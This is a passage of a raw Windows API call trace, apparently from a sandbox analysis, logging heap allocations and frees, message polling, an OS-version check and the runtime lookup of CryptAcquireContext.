dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0253.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0253.926] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0253.926] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0253.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0253.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0253.926] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0253.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0253.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0253.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.927] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0253.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0253.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0253.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0253.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0253.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0253.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0253.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0253.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.928] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0253.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0253.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0253.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0253.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0253.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0253.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.930] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0253.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.931] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0253.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0253.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9d0 [0253.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0253.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0253.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0253.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0253.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0253.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0253.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0253.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0253.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0253.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.933] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0253.934] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0253.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0253.934] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0253.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0253.934] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0253.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0253.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.935] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0253.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0253.935] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0253.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0253.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0253.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0253.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0253.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0253.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0253.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0253.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0253.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.938] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0253.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0253.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0253.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0253.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0253.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0253.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0253.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.940] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0253.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0253.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0253.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0253.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.941] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0253.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0253.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b34c8 | out: hHeap=0x25c0000) returned 1 [0253.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0253.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0253.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0253.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0253.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0253.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: 